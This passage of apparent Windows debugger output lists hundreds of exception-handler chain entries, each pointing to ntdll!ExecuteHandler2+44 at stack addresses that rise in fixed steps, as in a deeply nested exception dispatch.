000e5394: ntdll!ExecuteHandler2+44 (773e9d70)
000e5944: ntdll!ExecuteHandler2+44 (773e9d70)
000e5ef4: ntdll!ExecuteHandler2+44 (773e9d70)
000e64a4: ntdll!ExecuteHandler2+44 (773e9d70)
000e6a54: ntdll!ExecuteHandler2+44 (773e9d70)
000e7004: ntdll!ExecuteHandler2+44 (773e9d70)
000e75b4: ntdll!ExecuteHandler2+44 (773e9d70)
000e7b64: ntdll!ExecuteHandler2+44 (773e9d70)
000e8114: ntdll!ExecuteHandler2+44 (773e9d70)
000e86c4: ntdll!ExecuteHandler2+44 (773e9d70)
000e8c74: ntdll!ExecuteHandler2+44 (773e9d70)
000e9224: ntdll!ExecuteHandler2+44 (773e9d70)
000e97d4: ntdll!ExecuteHandler2+44 (773e9d70)
000e9d84: ntdll!ExecuteHandler2+44 (773e9d70)
000ea334: ntdll!ExecuteHandler2+44 (773e9d70)
000ea8e4: ntdll!ExecuteHandler2+44 (773e9d70)
000eae94: ntdll!ExecuteHandler2+44 (773e9d70)
000eb444: ntdll!ExecuteHandler2+44 (773e9d70)
000eb9f4: ntdll!ExecuteHandler2+44 (773e9d70)
000ebfa4: ntdll!ExecuteHandler2+44 (773e9d70)
000ec554: ntdll!ExecuteHandler2+44 (773e9d70)
000ecb04: ntdll!ExecuteHandler2+44 (773e9d70)
000ed0b4: ntdll!ExecuteHandler2+44 (773e9d70)
000ed664: ntdll!ExecuteHandler2+44 (773e9d70)
000edc14: ntdll!ExecuteHandler2+44 (773e9d70)
000ee1c4: ntdll!ExecuteHandler2+44 (773e9d70)
000ee774: ntdll!ExecuteHandler2+44 (773e9d70)
000eed24: ntdll!ExecuteHandler2+44 (773e9d70)
000ef2d4: ntdll!ExecuteHandler2+44 (773e9d70)
000ef884: ntdll!ExecuteHandler2+44 (773e9d70)
000efe34: ntdll!ExecuteHandler2+44 (773e9d70)
000f03e4: ntdll!ExecuteHandler2+44 (773e9d70)
000f0994: ntdll!ExecuteHandler2+44 (773e9d70)
000f0f44: ntdll!ExecuteHandler2+44 (773e9d70)
000f14f4: ntdll!ExecuteHandler2+44 (773e9d70)
000f1aa4: ntdll!ExecuteHandler2+44 (773e9d70)
000f2054: ntdll!ExecuteHandler2+44 (773e9d70)
000f2604: ntdll!ExecuteHandler2+44 (773e9d70)
000f2bb4: ntdll!ExecuteHandler2+44 (773e9d70)
000f3164: ntdll!ExecuteHandler2+44 (773e9d70)
000f3714: ntdll!ExecuteHandler2+44 (773e9d70)
000f3cc4: ntdll!ExecuteHandler2+44 (773e9d70)
000f4274: ntdll!ExecuteHandler2+44 (773e9d70)
000f4824: ntdll!ExecuteHandler2+44 (773e9d70)
000f4dd4: ntdll!ExecuteHandler2+44 (773e9d70)
000f5384: ntdll!ExecuteHandler2+44 (773e9d70)
000f5934: ntdll!ExecuteHandler2+44 (773e9d70)
000f5ee4: ntdll!ExecuteHandler2+44 (773e9d70)
000f6494: ntdll!ExecuteHandler2+44 (773e9d70)
000f6a44: ntdll!ExecuteHandler2+44 (773e9d70)
000f6ff4: ntdll!ExecuteHandler2+44 (773e9d70)
000f75a4: ntdll!ExecuteHandler2+44 (773e9d70)
000f7b54: ntdll!ExecuteHandler2+44 (773e9d70)
000f8104: ntdll!ExecuteHandler2+44 (773e9d70)
000f86b4: ntdll!ExecuteHandler2+44 (773e9d70)
000f8c64: ntdll!ExecuteHandler2+44 (773e9d70)
000f9214: ntdll!ExecuteHandler2+44 (773e9d70)
000f97c4: ntdll!ExecuteHandler2+44 (773e9d70)
000f9d74: ntdll!ExecuteHandler2+44 (773e9d70)
000fa324: ntdll!ExecuteHandler2+44 (773e9d70)
000fa8d4: ntdll!ExecuteHandler2+44 (773e9d70)
000fae84: ntdll!ExecuteHandler2+44 (773e9d70)
000fb434: ntdll!ExecuteHandler2+44 (773e9d70)
000fb9e4: ntdll!ExecuteHandler2+44 (773e9d70)
000fbf94: ntdll!ExecuteHandler2+44 (773e9d70)
000fc544: ntdll!ExecuteHandler2+44 (773e9d70)
000fcaf4: ntdll!ExecuteHandler2+44 (773e9d70)
000fd0a4: ntdll!ExecuteHandler2+44 (773e9d70)
000fd654: ntdll!ExecuteHandler2+44 (773e9d70)
000fdc04: ntdll!ExecuteHandler2+44 (773e9d70)
000fe1b4: ntdll!ExecuteHandler2+44 (773e9d70)
000fe764: ntdll!ExecuteHandler2+44 (773e9d70)
000fed14: ntdll!ExecuteHandler2+44 (773e9d70)
000ff2c4: ntdll!ExecuteHandler2+44 (773e9d70)
000ff874: ntdll!ExecuteHandler2+44 (773e9d70)
000ffe24: ntdll!ExecuteHandler2+44 (773e9d70)
001003d4: ntdll!ExecuteHandler2+44 (773e9d70)
00100984: ntdll!ExecuteHandler2+44 (773e9d70)
00100f34: ntdll!ExecuteHandler2+44 (773e9d70)
001014e4: ntdll!ExecuteHandler2+44 (773e9d70)
00101a94: ntdll!ExecuteHandler2+44 (773e9d70)
00102044: ntdll!ExecuteHandler2+44 (773e9d70)
001025f4: ntdll!ExecuteHandler2+44 (773e9d70)
00102ba4: ntdll!ExecuteHandler2+44 (773e9d70)
00103154: ntdll!ExecuteHandler2+44 (773e9d70)
00103704: ntdll!ExecuteHandler2+44 (773e9d70)
00103cb4: ntdll!ExecuteHandler2+44 (773e9d70)
00104264: ntdll!ExecuteHandler2+44 (773e9d70)
00104814: ntdll!ExecuteHandler2+44 (773e9d70)
00104dc4: ntdll!ExecuteHandler2+44 (773e9d70)
00105374: ntdll!ExecuteHandler2+44 (773e9d70)
00105924: ntdll!ExecuteHandler2+44 (773e9d70)
00105ed4: ntdll!ExecuteHandler2+44 (773e9d70)
00106484: ntdll!ExecuteHandler2+44 (773e9d70)
00106a34: ntdll!ExecuteHandler2+44 (773e9d70)
00106fe4: ntdll!ExecuteHandler2+44 (773e9d70)
00107594: ntdll!ExecuteHandler2+44 (773e9d70)
00107b44: ntdll!ExecuteHandler2+44 (773e9d70)
001080f4: ntdll!ExecuteHandler2+44 (773e9d70)
001086a4: ntdll!ExecuteHandler2+44 (773e9d70)
00108c54: ntdll!ExecuteHandler2+44 (773e9d70)
00109204: ntdll!ExecuteHandler2+44 (773e9d70)
001097b4: ntdll!ExecuteHandler2+44 (773e9d70)
00109d64: ntdll!ExecuteHandler2+44 (773e9d70)
0010a314: ntdll!ExecuteHandler2+44 (773e9d70)
0010a8c4: ntdll!ExecuteHandler2+44 (773e9d70)
0010ae74: ntdll!ExecuteHandler2+44 (773e9d70)
0010b424: ntdll!ExecuteHandler2+44 (773e9d70)
0010b9d4: ntdll!ExecuteHandler2+44 (773e9d70)
0010bf84: ntdll!ExecuteHandler2+44 (773e9d70)
0010c534: ntdll!ExecuteHandler2+44 (773e9d70)
0010cae4: ntdll!ExecuteHandler2+44 (773e9d70)
0010d094: ntdll!ExecuteHandler2+44 (773e9d70)
0010d644: ntdll!ExecuteHandler2+44 (773e9d70)
0010dbf4: ntdll!ExecuteHandler2+44 (773e9d70)
0010e1a4: ntdll!ExecuteHandler2+44 (773e9d70)
0010e754: ntdll!ExecuteHandler2+44 (773e9d70)
0010ed04: ntdll!ExecuteHandler2+44 (773e9d70)
0010f2b4: ntdll!ExecuteHandler2+44 (773e9d70)
0010f864: ntdll!ExecuteHandler2+44 (773e9d70)
0010fe14: ntdll!ExecuteHandler2+44 (773e9d70)
001103c4: ntdll!ExecuteHandler2+44 (773e9d70)
00110974: ntdll!ExecuteHandler2+44 (773e9d70)
00110f24: ntdll!ExecuteHandler2+44 (773e9d70)
001114d4: ntdll!ExecuteHandler2+44 (773e9d70)
00111a84: ntdll!ExecuteHandler2+44 (773e9d70)
00112034: ntdll!ExecuteHandler2+44 (773e9d70)
001125e4: ntdll!ExecuteHandler2+44 (773e9d70)
00112b94: ntdll!ExecuteHandler2+44 (773e9d70)
00113144: ntdll!ExecuteHandler2+44 (773e9d70)
001136f4: ntdll!ExecuteHandler2+44 (773e9d70)
00113ca4: ntdll!ExecuteHandler2+44 (773e9d70)
00114254: ntdll!ExecuteHandler2+44 (773e9d70)
00114804: ntdll!ExecuteHandler2+44 (773e9d70)
00114db4: ntdll!ExecuteHandler2+44 (773e9d70)
00115364: ntdll!ExecuteHandler2+44 (773e9d70)
00115914: ntdll!ExecuteHandler2+44 (773e9d70)
00115ec4: ntdll!ExecuteHandler2+44 (773e9d70)
00116474: ntdll!ExecuteHandler2+44 (773e9d70)
00116a24: ntdll!ExecuteHandler2+44 (773e9d70)
00116fd4: ntdll!ExecuteHandler2+44 (773e9d70)
00117584: ntdll!ExecuteHandler2+44 (773e9d70)
00117b34: ntdll!ExecuteHandler2+44 (773e9d70)
001180e4: ntdll!ExecuteHandler2+44 (773e9d70)
00118694: ntdll!ExecuteHandler2+44 (773e9d70)
00118c44: ntdll!ExecuteHandler2+44 (773e9d70)
001191f4: ntdll!ExecuteHandler2+44 (773e9d70)
001197a4: ntdll!ExecuteHandler2+44 (773e9d70)
00119d54: ntdll!ExecuteHandler2+44 (773e9d70)
0011a304: ntdll!ExecuteHandler2+44 (773e9d70)
0011a8b4: ntdll!ExecuteHandler2+44 (773e9d70)
0011ae64: ntdll!ExecuteHandler2+44 (773e9d70)
0011b414: ntdll!ExecuteHandler2+44 (773e9d70)
0011b9c4: ntdll!ExecuteHandler2+44 (773e9d70)
0011bf74: ntdll!ExecuteHandler2+44 (773e9d70)
0011c524: ntdll!ExecuteHandler2+44 (773e9d70)
0011cad4: ntdll!ExecuteHandler2+44 (773e9d70)
0011d084: ntdll!ExecuteHandler2+44 (773e9d70)
0011d634: ntdll!ExecuteHandler2+44 (773e9d70)
0011dbe4: ntdll!ExecuteHandler2+44 (773e9d70)
0011e194: ntdll!ExecuteHandler2+44 (773e9d70)
0011e744: ntdll!ExecuteHandler2+44 (773e9d70)
0011ecf4: ntdll!ExecuteHandler2+44 (773e9d70)
0011f2a4: ntdll!ExecuteHandler2+44 (773e9d70)
0011f854: ntdll!ExecuteHandler2+44 (773e9d70)
0011fe04: ntdll!ExecuteHandler2+44 (773e9d70)
001203b4: ntdll!ExecuteHandler2+44 (773e9d70)
00120964: ntdll!ExecuteHandler2+44 (773e9d70)
00120f14: ntdll!ExecuteHandler2+44 (773e9d70)
001214c4: ntdll!ExecuteHandler2+44 (773e9d70)
00121a74: ntdll!ExecuteHandler2+44 (773e9d70)
00122024: ntdll!ExecuteHandler2+44 (773e9d70)
001225d4: ntdll!ExecuteHandler2+44 (773e9d70)
00122b84: ntdll!ExecuteHandler2+44 (773e9d70)
00123134: ntdll!ExecuteHandler2+44 (773e9d70)
001236e4: ntdll!ExecuteHandler2+44 (773e9d70)
00123c94: ntdll!ExecuteHandler2+44 (773e9d70)
00124244: ntdll!ExecuteHandler2+44 (773e9d70)
001247f4: ntdll!ExecuteHandler2+44 (773e9d70)
00124da4: ntdll!ExecuteHandler2+44 (773e9d70)
00125354: ntdll!ExecuteHandler2+44 (773e9d70)
00125904: ntdll!ExecuteHandler2+44 (773e9d70)
00125eb4: ntdll!ExecuteHandler2+44 (773e9d70)
00126464: ntdll!ExecuteHandler2+44 (773e9d70)
00126a14: ntdll!ExecuteHandler2+44 (773e9d70)
00126fc4: ntdll!ExecuteHandler2+44 (773e9d70)
00127574: ntdll!ExecuteHandler2+44 (773e9d70)
00127b24: ntdll!ExecuteHandler2+44 (773e9d70)
001280d4: ntdll!ExecuteHandler2+44 (773e9d70)
00128684: ntdll!ExecuteHandler2+44 (773e9d70)
00128c34: ntdll!ExecuteHandler2+44 (773e9d70)
001291e4: ntdll!ExecuteHandler2+44 (773e9d70)
00129794: ntdll!ExecuteHandler2+44 (773e9d70)
00129d44: ntdll!ExecuteHandler2+44 (773e9d70)
0012a2f4: ntdll!ExecuteHandler2+44 (773e9d70)
0012a8a4: ntdll!ExecuteHandler2+44 (773e9d70)
0012ae54: ntdll!ExecuteHandler2+44 (773e9d70)
0012b404: ntdll!ExecuteHandler2+44 (773e9d70)
0012b9b4: ntdll!ExecuteHandler2+44 (773e9d70)
0012bf64: ntdll!ExecuteHandler2+44 (773e9d70)
0012c514: ntdll!ExecuteHandler2+44 (773e9d70)
0012cac4: ntdll!ExecuteHandler2+44 (773e9d70)
0012d074: ntdll!ExecuteHandler2+44 (773e9d70)
0012d624: ntdll!ExecuteHandler2+44 (773e9d70)
0012dbd4: ntdll!ExecuteHandler2+44 (773e9d70)
0012e184: ntdll!ExecuteHandler2+44 (773e9d70)
0012e734: ntdll!ExecuteHandler2+44 (773e9d70)
0012ece4: ntdll!ExecuteHandler2+44 (773e9d70)
0012f294: ntdll!ExecuteHandler2+44 (773e9d70)
0012f844: ntdll!ExecuteHandler2+44 (773e9d70)
0012fdf4: ntdll!ExecuteHandler2+44 (773e9d70)
001303a4: ntdll!ExecuteHandler2+44 (773e9d70)
00130954: ntdll!ExecuteHandler2+44 (773e9d70)
00130f04: ntdll!ExecuteHandler2+44 (773e9d70)
001314b4: ntdll!ExecuteHandler2+44 (773e9d70)
00131a64: ntdll!ExecuteHandler2+44 (773e9d70)
00132014: ntdll!ExecuteHandler2+44 (773e9d70)
001325c4: ntdll!ExecuteHandler2+44 (773e9d70)
00132b74: ntdll!ExecuteHandler2+44 (773e9d70)
00133124: ntdll!ExecuteHandler2+44 (773e9d70)
001336d4: ntdll!ExecuteHandler2+44 (773e9d70)
00133c84: ntdll!ExecuteHandler2+44 (773e9d70)
00134234: ntdll!ExecuteHandler2+44 (773e9d70)
001347e4: ntdll!ExecuteHandler2+44 (773e9d70)
00134d94: ntdll!ExecuteHandler2+44 (773e9d70)
00135344: ntdll!ExecuteHandler2+44 (773e9d70)
001358f4: ntdll!ExecuteHandler2+44 (773e9d70)
00135ea4: ntdll!ExecuteHandler2+44 (773e9d70)
00136454: ntdll!ExecuteHandler2+44 (773e9d70)
00136a04: ntdll!ExecuteHandler2+44 (773e9d70)
00136fb4: ntdll!ExecuteHandler2+44 (773e9d70)
00137564: ntdll!ExecuteHandler2+44 (773e9d70)
00137b14: ntdll!ExecuteHandler2+44 (773e9d70)
001380c4: ntdll!ExecuteHandler2+44 (773e9d70)
00138674: ntdll!ExecuteHandler2+44 (773e9d70)
00138c24: ntdll!ExecuteHandler2+44 (773e9d70)
001391d4: ntdll!ExecuteHandler2+44 (773e9d70)
00139784: ntdll!ExecuteHandler2+44 (773e9d70)
00139d34: ntdll!ExecuteHandler2+44 (773e9d70)
0013a2e4: ntdll!ExecuteHandler2+44 (773e9d70)
0013a894: ntdll!ExecuteHandler2+44 (773e9d70)
0013ae44: ntdll!ExecuteHandler2+44 (773e9d70)
0013b3f4: ntdll!ExecuteHandler2+44 (773e9d70)
0013b9a4: ntdll!ExecuteHandler2+44 (773e9d70)
0013bf54: ntdll!ExecuteHandler2+44 (773e9d70)
0013c504: ntdll!ExecuteHandler2+44 (773e9d70)
0013cab4: ntdll!ExecuteHandler2+44 (773e9d70)
0013d064: ntdll!ExecuteHandler2+44 (773e9d70)
0013d614: ntdll!ExecuteHandler2+44 (773e9d70)
0013dbc4: ntdll!ExecuteHandler2+44 (773e9d70)
0013e174: ntdll!ExecuteHandler2+44 (773e9d70)
0013e724: ntdll!ExecuteHandler2+44 (773e9d70)
0013ecd4: ntdll!ExecuteHandler2+44 (773e9d70)
0013f284: ntdll!ExecuteHandler2+44 (773e9d70)
0013f834: ntdll!ExecuteHandler2+44 (773e9d70)
0013fde4: ntdll!ExecuteHandler2+44 (773e9d70)
00140394: ntdll!ExecuteHandler2+44 (773e9d70)
00140944: ntdll!ExecuteHandler2+44 (773e9d70)
00140ef4: ntdll!ExecuteHandler2+44 (773e9d70)
001414a4: ntdll!ExecuteHandler2+44 (773e9d70)
00141a54: ntdll!ExecuteHandler2+44 (773e9d70)
00142004: ntdll!ExecuteHandler2+44 (773e9d70)
001425b4: ntdll!ExecuteHandler2+44 (773e9d70)
00142b64: ntdll!ExecuteHandler2+44 (773e9d70)
00143114: ntdll!ExecuteHandler2+44 (773e9d70)
001436c4: ntdll!ExecuteHandler2+44 (773e9d70)
00143c74: ntdll!ExecuteHandler2+44 (773e9d70)
00144224: ntdll!ExecuteHandler2+44 (773e9d70)
001447d4: ntdll!ExecuteHandler2+44 (773e9d70)
00144d84: ntdll!ExecuteHandler2+44 (773e9d70)
00145334: ntdll!ExecuteHandler2+44 (773e9d70)
001458e4: ntdll!ExecuteHandler2+44 (773e9d70)
00145e94: ntdll!ExecuteHandler2+44 (773e9d70)
00146444: ntdll!ExecuteHandler2+44 (773e9d70)
001469f4: ntdll!ExecuteHandler2+44 (773e9d70)
00146fa4: ntdll!ExecuteHandler2+44 (773e9d70)
00147554: ntdll!ExecuteHandler2+44 (773e9d70)
00147b04: ntdll!ExecuteHandler2+44 (773e9d70)
001480b4: ntdll!ExecuteHandler2+44 (773e9d70)
00148664: ntdll!ExecuteHandler2+44 (773e9d70)
00148c14: ntdll!ExecuteHandler2+44 (773e9d70)
001491c4: ntdll!ExecuteHandler2+44 (773e9d70)
00149774: ntdll!ExecuteHandler2+44 (773e9d70)
00149d24: ntdll!ExecuteHandler2+44 (773e9d70)
0014a2d4: ntdll!ExecuteHandler2+44 (773e9d70)
0014a884: ntdll!ExecuteHandler2+44 (773e9d70)
0014ae34: ntdll!ExecuteHandler2+44 (773e9d70)
0014b3e4: ntdll!ExecuteHandler2+44 (773e9d70)
0014b994: ntdll!ExecuteHandler2+44 (773e9d70)
0014bf44: ntdll!ExecuteHandler2+44 (773e9d70)
0014c4f4: ntdll!ExecuteHandler2+44 (773e9d70)
0014caa4: ntdll!ExecuteHandler2+44 (773e9d70)
0014d054: ntdll!ExecuteHandler2+44 (773e9d70)
0014d604: ntdll!ExecuteHandler2+44 (773e9d70)
0014dbb4: ntdll!ExecuteHandler2+44 (773e9d70)
0014e164: ntdll!ExecuteHandler2+44 (773e9d70)
0014e714: ntdll!ExecuteHandler2+44 (773e9d70)
0014ecc4: ntdll!ExecuteHandler2+44 (773e9d70)
0014f274: ntdll!ExecuteHandler2+44 (773e9d70)
0014f824: ntdll!ExecuteHandler2+44 (773e9d70)
0014fdd4: ntdll!ExecuteHandler2+44 (773e9d70)
00150384: ntdll!ExecuteHandler2+44 (773e9d70)
00150934: ntdll!ExecuteHandler2+44 (773e9d70)
00150ee4: ntdll!ExecuteHandler2+44 (773e9d70)
00151494: ntdll!ExecuteHandler2+44 (773e9d70)
00151a44: ntdll!ExecuteHandler2+44 (773e9d70)
00151ff4: ntdll!ExecuteHandler2+44 (773e9d70)
001525a4: ntdll!ExecuteHandler2+44 (773e9d70)
00152b54: ntdll!ExecuteHandler2+44 (773e9d70)
00153104: ntdll!ExecuteHandler2+44 (773e9d70)
001536b4: ntdll!ExecuteHandler2+44 (773e9d70)
00153c64: ntdll!ExecuteHandler2+44 (773e9d70)
00154214: ntdll!ExecuteHandler2+44 (773e9d70)
001547c4: ntdll!ExecuteHandler2+44 (773e9d70)
00154d74: ntdll!ExecuteHandler2+44 (773e9d70)
00155324: ntdll!ExecuteHandler2+44 (773e9d70)
001558d4: ntdll!ExecuteHandler2+44 (773e9d70)
00155e84: ntdll!ExecuteHandler2+44 (773e9d70)
00156434: ntdll!ExecuteHandler2+44 (773e9d70)
001569e4: ntdll!ExecuteHandler2+44 (773e9d70)
00156f94: ntdll!ExecuteHandler2+44 (773e9d70)
00157544: ntdll!ExecuteHandler2+44 (773e9d70)
00157af4: ntdll!ExecuteHandler2+44 (773e9d70)
001580a4: ntdll!ExecuteHandler2+44 (773e9d70)
00158654: ntdll!ExecuteHandler2+44 (773e9d70)
00158c04: ntdll!ExecuteHandler2+44 (773e9d70)
001591b4: ntdll!ExecuteHandler2+44 (773e9d70)
00159764: ntdll!ExecuteHandler2+44 (773e9d70)
00159d14: ntdll!ExecuteHandler2+44 (773e9d70)
0015a2c4: ntdll!ExecuteHandler2+44 (773e9d70)
0015a874: ntdll!ExecuteHandler2+44 (773e9d70)
0015ae24: ntdll!ExecuteHandler2+44 (773e9d70)
0015b3d4: ntdll!ExecuteHandler2+44 (773e9d70)
0015b984: ntdll!ExecuteHandler2+44 (773e9d70)
0015bf34: ntdll!ExecuteHandler2+44 (773e9d70)
0015c4e4: ntdll!ExecuteHandler2+44 (773e9d70)
0015ca94: ntdll!ExecuteHandler2+44 (773e9d70)
0015d044: ntdll!ExecuteHandler2+44 (773e9d70)
0015d5f4: ntdll!ExecuteHandler2+44 (773e9d70)
0015dba4: ntdll!ExecuteHandler2+44 (773e9d70)
0015e154: ntdll!ExecuteHandler2+44 (773e9d70)
0015e704: ntdll!ExecuteHandler2+44 (773e9d70)
0015ecb4: ntdll!ExecuteHandler2+44 (773e9d70)
0015f264: ntdll!ExecuteHandler2+44 (773e9d70)
0015f814: ntdll!ExecuteHandler2+44 (773e9d70)
0015fdc4: ntdll!ExecuteHandler2+44 (773e9d70)
00160374: ntdll!ExecuteHandler2+44 (773e9d70)
00160924: ntdll!ExecuteHandler2+44 (773e9d70)
00160ed4: ntdll!ExecuteHandler2+44 (773e9d70)
00161484: ntdll!ExecuteHandler2+44 (773e9d70)
00161a34: ntdll!ExecuteHandler2+44 (773e9d70)
00161fe4: ntdll!ExecuteHandler2+44 (773e9d70)
00162594: ntdll!ExecuteHandler2+44 (773e9d70)
00162b44: ntdll!ExecuteHandler2+44 (773e9d70)
001630f4: ntdll!ExecuteHandler2+44 (773e9d70)
001636a4: ntdll!ExecuteHandler2+44 (773e9d70)
00163c54: ntdll!ExecuteHandler2+44 (773e9d70)
00164204: ntdll!ExecuteHandler2+44 (773e9d70)
001647b4: ntdll!ExecuteHandler2+44 (773e9d70)
00164d64: ntdll!ExecuteHandler2+44 (773e9d70)
00165314: ntdll!ExecuteHandler2+44 (773e9d70)
001658c4: ntdll!ExecuteHandler2+44 (773e9d70)
00165e74: ntdll!ExecuteHandler2+44 (773e9d70)
00166424: ntdll!ExecuteHandler2+44 (773e9d70)
001669d4: ntdll!ExecuteHandler2+44 (773e9d70)
00166f84: ntdll!ExecuteHandler2+44 (773e9d70)
00167534: ntdll!ExecuteHandler2+44 (773e9d70)
00167ae4: ntdll!ExecuteHandler2+44 (773e9d70)
00168094: ntdll!ExecuteHandler2+44 (773e9d70)
00168644: ntdll!ExecuteHandler2+44 (773e9d70)
00168bf4: ntdll!ExecuteHandler2+44 (773e9d70)
001691a4: ntdll!ExecuteHandler2+44 (773e9d70)
00169754: ntdll!ExecuteHandler2+44 (773e9d70)
00169d04: ntdll!ExecuteHandler2+44 (773e9d70)
0016a2b4: ntdll!ExecuteHandler2+44 (773e9d70)
0016a864: ntdll!ExecuteHandler2+44 (773e9d70)
0016ae14: ntdll!ExecuteHandler2+44 (773e9d70)
0016b3c4: ntdll!ExecuteHandler2+44 (773e9d70)
0016b974: ntdll!ExecuteHandler2+44 (773e9d70)
0016bf24: ntdll!ExecuteHandler2+44 (773e9d70)
0016c4d4: ntdll!ExecuteHandler2+44 (773e9d70)
0016ca84: ntdll!ExecuteHandler2+44 (773e9d70)
0016d034: ntdll!ExecuteHandler2+44 (773e9d70)
0016d5e4: ntdll!ExecuteHandler2+44 (773e9d70)
0016db94: ntdll!ExecuteHandler2+44 (773e9d70)
0016e144: ntdll!ExecuteHandler2+44 (773e9d70)
0016e6f4: ntdll!ExecuteHandler2+44 (773e9d70)
0016eca4: ntdll!ExecuteHandler2+44 (773e9d70)
0016f254: ntdll!ExecuteHandler2+44 (773e9d70)
0016f804: ntdll!ExecuteHandler2+44 (773e9d70)
0016fdb4: ntdll!ExecuteHandler2+44 (773e9d70)
00170364: ntdll!ExecuteHandler2+44 (773e9d70)
00170914: ntdll!ExecuteHandler2+44 (773e9d70)
00170ec4: ntdll!ExecuteHandler2+44 (773e9d70)
00171474: ntdll!ExecuteHandler2+44 (773e9d70)
00171a24: ntdll!ExecuteHandler2+44 (773e9d70)
00171fd4: ntdll!ExecuteHandler2+44 (773e9d70)
00172584: ntdll!ExecuteHandler2+44 (773e9d70)
00172b34: ntdll!ExecuteHandler2+44 (773e9d70)
001730e4: ntdll!ExecuteHandler2+44 (773e9d70)
00173694: ntdll!ExecuteHandler2+44 (773e9d70)
00173c44: ntdll!ExecuteHandler2+44 (773e9d70)
001741f4: ntdll!ExecuteHandler2+44 (773e9d70)
001747a4: ntdll!ExecuteHandler2+44 (773e9d70)
00174d54: ntdll!ExecuteHandler2+44 (773e9d70)
00175304: ntdll!ExecuteHandler2+44 (773e9d70)
001758b4: ntdll!ExecuteHandler2+44 (773e9d70)
00175e64: ntdll!ExecuteHandler2+44 (773e9d70)
00176414: ntdll!ExecuteHandler2+44 (773e9d70)
001769c4: ntdll!ExecuteHandler2+44 (773e9d70)
00176f74: ntdll!ExecuteHandler2+44 (773e9d70)
00177524: ntdll!ExecuteHandler2+44 (773e9d70)
00177ad4: ntdll!ExecuteHandler2+44 (773e9d70)
00178084: ntdll!ExecuteHandler2+44 (773e9d70)
00178634: ntdll!ExecuteHandler2+44 (773e9d70)
00178be4: ntdll!ExecuteHandler2+44 (773e9d70)
00179194: ntdll!ExecuteHandler2+44 (773e9d70)
00179744: ntdll!ExecuteHandler2+44 (773e9d70)
00179cf4: ntdll!ExecuteHandler2+44 (773e9d70)
0017a2a4: ntdll!ExecuteHandler2+44 (773e9d70)
0017a854: ntdll!ExecuteHandler2+44 (773e9d70)
0017ae04: ntdll!ExecuteHandler2+44 (773e9d70)
0017b3b4: ntdll!ExecuteHandler2+44 (773e9d70)
0017b964: ntdll!ExecuteHandler2+44 (773e9d70)
0017bf14: ntdll!ExecuteHandler2+44 (773e9d70)
0017c4c4: ntdll!ExecuteHandler2+44 (773e9d70)
0017ca74: ntdll!ExecuteHandler2+44 (773e9d70)
0017d024: ntdll!ExecuteHandler2+44 (773e9d70)
0017d5d4: ntdll!ExecuteHandler2+44 (773e9d70)
0017db84: ntdll!ExecuteHandler2+44 (773e9d70)
0017e134: ntdll!ExecuteHandler2+44 (773e9d70)
0017e6e4: ntdll!ExecuteHandler2+44 (773e9d70)
0017ec94: ntdll!ExecuteHandler2+44 (773e9d70)
0017f244: ntdll!ExecuteHandler2+44 (773e9d70)
0017f7f4: ntdll!ExecuteHandler2+44 (773e9d70)
0017fda4: ntdll!ExecuteHandler2+44 (773e9d70)
00180354: ntdll!ExecuteHandler2+44 (773e9d70)
00180904: ntdll!ExecuteHandler2+44 (773e9d70)
00180eb4: ntdll!ExecuteHandler2+44 (773e9d70)
00181464: ntdll!ExecuteHandler2+44 (773e9d70)
00181a14: ntdll!ExecuteHandler2+44 (773e9d70)
00181fc4: ntdll!ExecuteHandler2+44 (773e9d70)
00182574: ntdll!ExecuteHandler2+44 (773e9d70)
00182b24: ntdll!ExecuteHandler2+44 (773e9d70)
001830d4: ntdll!ExecuteHandler2+44 (773e9d70)
00183684: ntdll!ExecuteHandler2+44 (773e9d70)
00183c34: ntdll!ExecuteHandler2+44 (773e9d70)
001841e4: ntdll!ExecuteHandler2+44 (773e9d70)
00184794: ntdll!ExecuteHandler2+44 (773e9d70)
00184d44: ntdll!ExecuteHandler2+44 (773e9d70)
001852f4: ntdll!ExecuteHandler2+44 (773e9d70)
001858a4: ntdll!ExecuteHandler2+44 (773e9d70)
00185e54: ntdll!ExecuteHandler2+44 (773e9d70)
00186404: ntdll!ExecuteHandler2+44 (773e9d70)
001869b4: ntdll!ExecuteHandler2+44 (773e9d70)
00186f64: ntdll!ExecuteHandler2+44 (773e9d70)
00187514: ntdll!ExecuteHandler2+44 (773e9d70)
00187ac4: ntdll!ExecuteHandler2+44 (773e9d70)
00188074: ntdll!ExecuteHandler2+44 (773e9d70)
00188624: ntdll!ExecuteHandler2+44 (773e9d70)
00188bd4: ntdll!ExecuteHandler2+44 (773e9d70)
00189184: ntdll!ExecuteHandler2+44 (773e9d70)
00189734: ntdll!ExecuteHandler2+44 (773e9d70)
00189ce4: ntdll!ExecuteHandler2+44 (773e9d70)
0018a294: ntdll!ExecuteHandler2+44 (773e9d70)
0018a844: ntdll!ExecuteHandler2+44 (773e9d70)
0018adf4: ntdll!ExecuteHandler2+44 (773e9d70)
0018b3a4: ntdll!ExecuteHandler2+44 (773e9d70)
0018b954: ntdll!ExecuteHandler2+44 (773e9d70)
0018bf04: ntdll!ExecuteHandler2+44 (773e9d70)
0018c4b4: ntdll!ExecuteHandler2+44 (773e9d70)
0018ca64: ntdll!ExecuteHandler2+44 (773e9d70)
0018d014: ntdll!ExecuteHandler2+44 (773e9d70)
0018d5c4: ntdll!ExecuteHandler2+44 (773e9d70)
0018db74: ntdll!ExecuteHandler2+44 (773e9d70)
0018e124: ntdll!ExecuteHandler2+44 (773e9d70)
0018e6d4: ntdll!ExecuteHandler2+44 (773e9d70)
0018ec84: ntdll!ExecuteHandler2+44 (773e9d70)
0018f234: ntdll!ExecuteHandler2+44 (773e9d70)
0018f7e4: ntdll!ExecuteHandler2+44 (773e9d70)
0018fd94: ntdll!ExecuteHandler2+44 (773e9d70)
00190344: ntdll!ExecuteHandler2+44 (773e9d70)
001908f4: ntdll!ExecuteHandler2+44 (773e9d70)
00190ea4: ntdll!ExecuteHandler2+44 (773e9d70)
00191454: ntdll!ExecuteHandler2+44 (773e9d70)
00191a04: ntdll!ExecuteHandler2+44 (773e9d70)
00191fb4: ntdll!ExecuteHandler2+44 (773e9d70)
00192564: ntdll!ExecuteHandler2+44 (773e9d70)
00192b14: ntdll!ExecuteHandler2+44 (773e9d70)
001930c4: ntdll!ExecuteHandler2+44 (773e9d70)
00193674: ntdll!ExecuteHandler2+44 (773e9d70)
00193c24: ntdll!ExecuteHandler2+44 (773e9d70)
001941d4: ntdll!ExecuteHandler2+44 (773e9d70)
00194784: ntdll!ExecuteHandler2+44 (773e9d70)
00194d34: ntdll!ExecuteHandler2+44 (773e9d70)
